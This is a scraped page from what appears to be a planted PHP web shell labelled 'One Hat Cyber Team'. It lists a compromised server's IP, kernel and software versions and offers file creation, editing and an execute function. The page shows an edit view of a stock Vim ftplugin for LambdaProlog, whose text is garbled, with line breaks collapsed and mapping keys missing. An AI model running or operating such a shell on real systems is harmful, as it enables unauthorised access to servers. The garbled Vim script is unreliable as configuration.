⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.172
Server IP:
13.200.189.69
Server:
Linux ip-172-31-46-210 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
vim
/
vim81
/
ftplugin
/
Edit File: lprolog.vim
" Vim settings file " Language: LambdaProlog (Teyjus) " Maintainer: Markus Mottl
" URL: http://www.ocaml.info/vim/ftplugin/lprolog.vim " Last Change: 2006 Feb 05 " 2001 Sep 16 - fixed 'no_mail_maps'-bug (MM) " 2001 Sep 02 - initial release (MM) " Only do these settings when not done yet for this buffer if exists("b:did_ftplugin") finish endif " Don't do other file type settings for this buffer let b:did_ftplugin = 1 " Error format setlocal efm=%+A./%f:%l.%c:\ %m formatprg=fmt\ -w75\ -p\\% " Formatting of comments setlocal formatprg=fmt\ -w75\ -p\\% " Add mappings, unless the user didn't want this. if !exists("no_plugin_maps") && !exists("no_lprolog_maps") " Uncommenting if !hasmapto('
Comment') nmap
c
LUncomOn vmap
c
BUncomOn nmap
C
LUncomOff vmap
C
BUncomOff endif nnoremap
LUncomOn mz0i/*
$A */
`z nnoremap
LUncomOff
:s/^\/\* \(.*\) \*\//\1/
vnoremap
BUncomOn
:'<,'>
`
0i/*
`>o
0i*/
`< vnoremap
BUncomOff
:'<,'>
`
dd`< endif
Simpan